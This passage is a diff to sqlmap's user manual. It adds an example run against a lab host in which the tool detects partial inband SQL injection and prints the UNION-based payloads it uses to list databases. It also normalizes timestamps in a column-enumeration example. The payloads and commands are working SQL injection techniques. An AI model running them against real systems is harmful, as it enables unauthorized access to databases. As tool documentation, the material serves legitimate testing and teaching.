|
||||||
|
<tscreen><verb>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 \
|
||||||
|
--union-use --dbs
|
||||||
|
|
||||||
|
[...]
|
||||||
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
|
[hh:mm:56] [INFO] fetching database names
|
||||||
|
[hh:mm:56] [INFO] testing inband sql injection on parameter 'id'
|
||||||
|
[hh:mm:56] [INFO] the target url could be affected by an inband sql injection vulnerability
|
||||||
|
[hh:mm:56] [INFO] confirming full inband sql injection on parameter 'id'
|
||||||
|
[hh:mm:56] [WARNING] the target url is not affected by an exploitable full inband sql
|
||||||
|
injection vulnerability
|
||||||
|
[hh:mm:56] [INFO] confirming partial inband sql injection on parameter 'id'
|
||||||
|
[hh:mm:56] [INFO] the target url is affected by an exploitable partial inband sql injection
|
||||||
|
vulnerability
|
||||||
|
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),
|
||||||
|
IFNULL(CAST(COUNT(schema_name) AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL
|
||||||
|
FROM information_schema.SCHEMATA# AND 1062=1062
|
||||||
|
[hh:mm:56] [INFO] performed 6 queries in 0 seconds
|
||||||
|
[hh:mm:56] [INFO] the SQL query provided returns 4 entries
|
||||||
|
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
|
||||||
|
CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM
|
||||||
|
information_schema.SCHEMATA LIMIT 0, 1# AND 1421=1421
|
||||||
|
[hh:mm:56] [INFO] performed 7 queries in 0 seconds
|
||||||
|
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
|
||||||
|
CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM
|
||||||
|
information_schema.SCHEMATA LIMIT 1, 1# AND 9553=9553
|
||||||
|
[hh:mm:56] [INFO] performed 8 queries in 0 seconds
|
||||||
|
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
|
||||||
|
CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM
|
||||||
|
information_schema.SCHEMATA LIMIT 2, 1# AND 6805=6805
|
||||||
|
[hh:mm:56] [INFO] performed 9 queries in 0 seconds
|
||||||
|
[hh:mm:56] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
|
||||||
|
CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM
|
||||||
|
information_schema.SCHEMATA LIMIT 3, 1# AND 739=739
|
||||||
|
[hh:mm:56] [INFO] performed 10 queries in 0 seconds
|
||||||
|
available databases [4]:
|
||||||
|
[*] information_schema
|
||||||
|
[*] mysql
|
||||||
|
[*] privatedb
|
||||||
|
[*] test
|
||||||
|
</verb></tscreen>
|
||||||
|
|
||||||
|
<p>
|
||||||
|
As you can see, sqlmap identified that the parameter is affected by a
|
||||||
|
partial inband SQL injection, consequently counted the number of query
|
||||||
|
output entries and retrieved once per time by forcing the parameter
|
||||||
|
(<tt>id</tt>) value <tt>1</tt> to its negative value <tt>-1</tt> so that
|
||||||
|
it does not returns, presumibly, any output leaving our own <tt>UNION ALL
|
||||||
|
SELECT</tt> statement to produce one entry at a time and display it in the
|
||||||
|
page content.
|
||||||
|
|
||||||
|
|
||||||
<sect1>Fingerprint
|
<sect1>Fingerprint
|
||||||
|
@ -2673,14 +2825,14 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --col
|
||||||
[...]
|
[...]
|
||||||
back-end DBMS: MySQL >= 5.0.0
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
[15:54:25] [WARNING] missing database parameter, sqlmap is going to use the current
|
[hh:mm:25] [WARNING] missing database parameter, sqlmap is going to use the current
|
||||||
database to enumerate table 'users' columns
|
database to enumerate table 'users' columns
|
||||||
[15:54:25] [INFO] fetching current database
|
[hh:mm:25] [INFO] fetching current database
|
||||||
[15:54:25] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
|
[hh:mm:25] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
|
||||||
[15:54:25] [INFO] retrieved: test
|
[hh:mm:25] [INFO] retrieved: test
|
||||||
[15:54:25] [INFO] performed 34 queries in 0 seconds
|
[hh:mm:25] [INFO] performed 34 queries in 0 seconds
|
||||||
[15:54:25] [INFO] fetching columns for table 'users' on database 'test'
|
[hh:mm:25] [INFO] fetching columns for table 'users' on database 'test'
|
||||||
[15:54:25] [INFO] fetching number of columns for table 'users' on database 'test'
|
[hh:mm:25] [INFO] fetching number of columns for table 'users' on database 'test'
|
||||||
[...]
|
[...]
|
||||||
Database: test
|
Database: test
|
||||||
Table: users
|
Table: users
|
||||||
|
|
Loading…
Reference in New Issue
Block a user